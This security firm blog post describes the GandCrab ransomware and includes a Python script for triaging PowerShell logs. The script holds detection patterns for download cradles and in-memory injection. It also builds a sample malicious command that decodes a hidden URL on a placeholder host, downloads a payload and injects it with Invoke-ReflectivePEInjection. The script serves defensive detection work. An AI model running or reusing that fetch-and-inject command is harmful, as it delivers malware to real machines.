A recently notorious ransomware, GandCrab, has finally been retired by its developers after a decryptor became publicly available. Like most ransomware, it targeted organisations and individuals indiscriminately. While it went through many iterations after its release into the wild, its primary function remained the same: encrypt the victim's files and exfiltrate sensitive information, then offer a key to decrypt those files for an exorbitant fee, payable in a cryptocurrency chosen to resist tracing (Dash, in this instance).
GandCrab followed a Ransomware as a Service (RaaS) model: it was sold to affiliates, who kept 60% of the revenue and could also access victim information including IP addresses, domain information, operating system details and so on. Over five core versions of the malware were distributed through various malware campaigns, spam emails, exploit kits and fake torrenting sites. Each new version was released to defeat the decryption tools published for the previous one. The first iteration used basic encryption methods; a later version loaded the DLL/EXE payload directly into the victim's PowerShell process with Invoke-ReflectivePEInjection, without ever writing it to disk. As with other ransomware, the victim was presented with an obfuscated script to download which, unbeknownst to the user, decoded a URL pointing to the GandCrab download.
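The delivery chain just described (obfuscated script, base64-hidden URL, payload fetched and run in memory via Invoke-ReflectivePEInjection) is exactly what PowerShell command-line and ScriptBlock logging exposes. The following is an added example of triage logic for such logs; it is not Alcorn Group's tooling or anything from the GandCrab samples. The log lines, the indicator list, the scoring rule and the `example.invalid` URL are all constructed for illustration, and the `-EncodedCommand` parsing only handles the `-e`, `-enc` and `-encodedcommand` spellings.

```python
"""Triage PowerShell command lines for the fileless-downloader pattern:
obfuscated launcher -> base64-hidden URL -> payload fetched and injected
in memory with Invoke-ReflectivePEInjection.
Added example (not Alcorn Group's tooling). Sample logs, indicator list
and scoring rule are constructed assumptions for illustration."""
import base64
import re

# Indicators a defender would key on in process-creation / ScriptBlock logs.
# Assumption for the example; not a complete or official GandCrab signature.
INDICATORS = {
    "reflective_injection": re.compile(r"Invoke-ReflectivePEInjection", re.I),
    "download_cradle": re.compile(
        r"Download(String|File|Data)|Invoke-WebRequest|\biwr\b", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
}

# -e / -enc / -encodedcommand followed by a base64 blob (UTF-16LE script).
ENCODED_FLAG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
URL = re.compile(r"https?://[^\s'\"<>)]+", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Replace an -EncodedCommand payload with its decoded script so that
    indicators hidden behind the flag are visible to the indicator scan."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline  # not really base64/UTF-16; scan the raw line instead
    return cmdline[: m.start()] + decoded


def extract_hidden_urls(script: str) -> list[str]:
    """Collect plaintext URLs plus any URL that only appears after
    base64-decoding literal blobs embedded in the script (the 'decoded a
    URL pointing to the download' step). Non-base64 tokens are skipped."""
    urls = set(URL.findall(script))
    for blob in B64_BLOB.findall(script):
        try:
            plain = base64.b64decode(blob, validate=True).decode("utf-8", "ignore")
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        urls.update(URL.findall(plain))
    return sorted(urls)


def triage(cmdline: str) -> dict:
    """Return matched indicators, recovered URLs and a verdict for one line."""
    script = decode_encoded_command(cmdline)
    hits = [name for name, rx in INDICATORS.items() if rx.search(script)]
    urls = extract_hidden_urls(script)
    # Scoring assumption: in-memory PE injection combined with a download
    # cradle or a decoded URL is a high-confidence match for this pattern.
    high = "reflective_injection" in hits and ("download_cradle" in hits or bool(urls))
    verdict = "high" if high else ("review" if hits else "clean")
    return {"hits": hits, "urls": urls, "verdict": verdict}


def _enc(ps: str) -> str:
    """Build an -EncodedCommand blob the way PowerShell expects (UTF-16LE)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode()


# Constructed sample log lines (not captured from a real incident).
STAGE2_URL = "http://payload.example.invalid/gc.bin"  # placeholder, not a real host
SAMPLE_LOGS = [
    # Malicious: URL hidden in base64, payload downloaded and injected in memory.
    "powershell.exe -nop -w hidden -enc " + _enc(
        "$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
        + base64.b64encode(STAGE2_URL.encode()).decode() + "'));"
        "$b=(New-Object Net.WebClient).DownloadData($u);"
        "Invoke-ReflectivePEInjection -PEBytes $b"),
    # Benign administrative command for contrast.
    "powershell.exe -Command Get-Service -Name Spooler",
]

if __name__ == "__main__":
    for line in SAMPLE_LOGS:
        print(triage(line))
```

Running the block prints a `high` verdict with the recovered `http://payload.example.invalid/gc.bin` URL for the constructed malicious line and `clean` for the benign one. In production the same logic would be fed from Windows Event ID 4104 (ScriptBlock) or 4688 / Sysmon process-creation events, and the indicator list would be tuned against the environment's own baseline of legitimate PowerShell use.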
According to the GandCrab developers, the campaign earned over $2 billion in revenue from roughly 50,000 devices within the last two months. Its alleged success can be attributed to the developers' persistence in answering each decryptor or mitigation with a newer, more effective version of the malware, sometimes released within hours of a fix. This back-and-forth between fixes and malware updates finally ceased when the GandCrab developers officially halted the malware at version 5.2, boasting of a "well-deserved retirement" in response to the release of Bitdefender's decryptor.
Alcorn Group has observed this variant of ransomware, amongst others, through various Incident Response (IR) engagements. Ransomware is exceptionally damaging to individuals and organisations alike; each newly identified strain poses significant business risk because of the lengths attackers go to in order to ensure a ransom is paid.
Ransomware operators can never be trusted, whatever lengths the criminals go to in convincing their victims that their files will be restored after payment. Even if a ransom is paid, sensitive data stored on a compromised system has likely already been exfiltrated. Newer, more sophisticated and damaging strains can surface suddenly, as GandCrab's own lifecycle demonstrated.
If you, or your organisation, have encountered GandCrab, please refer to Bitdefender's decryptor. Contact us for more information on how ransomware can affect your organisation and what to do in the event of a malware infection.